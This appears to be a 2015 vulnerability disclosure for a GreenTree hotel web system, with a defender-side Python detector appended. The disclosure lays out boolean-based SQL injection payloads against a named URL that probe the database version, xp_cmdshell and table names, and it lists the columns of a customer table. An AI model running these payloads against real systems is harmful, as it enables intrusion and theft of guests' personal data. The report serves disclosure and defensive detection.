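2015-08-24: Details reported to the vendor; awaiting vendor handling
2015-08-26: Vendor confirmed; details disclosed to the vendor only
2015-09-05: Details disclosed to core white hats and relevant domain experts
2015-09-15: Details disclosed to regular white hats
2015-09-25: Details disclosed to intern white hats
2015-10-10: Details disclosed to the public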
Boolean-based SQL injection
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?hotelcode=531001
Input: 'and'1'='1
Input: 'and'1'='2
Checking the database version
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 1=(select @@VERSION) and '1'='1
Current database name
Local service name
24 databases
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 24= (select count(name) from master.dbo.sysdatabases) and '1'='1
XP_CMDSHELL exists
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 1= (Select count(name) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') and '1'='1
The XP_regread extended stored procedure exists
Enumerating tables
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 1= (select top 1 name from sysobjects where xtype='u' ) and '1'='1
select top 1 name from sysobjects where xtype='u' and name not in('TurnsTable','crscount')
select top 1 name from sysobjects where xtype='u' and name not in('TurnsTable','crscount','blacklist')
select top 1 name from sysobjects where xtype='u' and name not in('TurnsTable','crscount','blacklist','Iccard_Request','m_initrebate','Customer')
There are 672 tables in total; they are not all listed here.
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 672= ( select count(name) from sysobjects where xtype='u') and '1'='1
Looking at table columns, taking Customer as an example: 39 columns, as follows:
CustomerCode, FirstName, LastName, MiddleName, NickName, Gender, Birthday, NationalityID, Race, Title, Language1, Language2, CustomerTypeID, TravelAgentID, CustomerOrigin, Region1, Region2, Note1, Note2, Company, Address, Telephone, Zip, VisaID, ExpirationDate, IDTypeID, IDNumber, VIPLevel, VIPNumber, CreateDate, UploadFlag, Priority, Mobile, CompanyTel, CompanyFax, MemberType, MemberNo, UploadDate, HotelCode
Looking at one column
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 1= (select top 1 FirstName from Customer) and '1'='1
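A defender-side check for the request pattern in this report, as an added example that is not part of the original report or the vendor's code: it validates the hotelcode parameter against an assumed digits-only format and labels the probe families shown above. The names classify, flagged_by_client and PROBES, the digit-length limit and the sample requests are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate hotelcode is a short digit string such as 531001.
HOTELCODE_OK = re.compile(r"\d{1,10}")

# Probe families that appear in the report, matched on the decoded value.
PROBES = [
    ("version_probe", re.compile(r"@@version", re.I)),
    ("xp_proc_probe", re.compile(r"\bxp_\w+", re.I)),
    ("catalog_enum", re.compile(r"\bsys(objects|databases|columns)\b", re.I)),
    ("subquery", re.compile(r"\(\s*select\b", re.I)),
    ("boolean_test", re.compile(r"\band\s*'\w*'\s*=\s*'\w*", re.I)),
]

def classify(url):
    """Return [] for a well-formed request, else the probe labels that matched."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    labels = []
    for value in query.get("hotelcode", []):
        if HOTELCODE_OK.fullmatch(value):
            continue
        hits = [name for name, rx in PROBES if rx.search(value)]
        labels.extend(hits or ["malformed"])
    return labels

def flagged_by_client(requests):
    """Count flagged requests per client from (client, url) pairs."""
    return Counter(client for client, url in requests if classify(url))

# Constructed sample requests (documentation IP addresses, not real traffic).
BASE = "/frontinvest/roomdetail.aspx?hotelcode="
SAMPLE = [
    ("192.0.2.10", BASE + "531001"),
    ("192.0.2.66", BASE + "531001%27and%271%27%3D%271"),
    ("192.0.2.66", BASE + "531001%27+and+1%3D(select+%40%40VERSION)+and+%271%27%3D%271"),
    ("192.0.2.66", BASE + "531001%27+and+1%3D(select+count(name)+from+sysobjects"
                          "+where+name%3D%27xp_cmdshell%27)+and+%271%27%3D%271"),
    ("192.0.2.10", BASE + "abc"),
]

if __name__ == "__main__":
    for client, url in SAMPLE:
        print(client, classify(url) or "ok")
    print(dict(flagged_by_client(SAMPLE)))
```

The same digits-only check belongs in the application itself, in front of a parameterized query, so that a non-numeric hotelcode is rejected before it reaches the database.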
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2015-08-26 08:58
Thank you for your attention to GreenTree; this has been handled...
None yet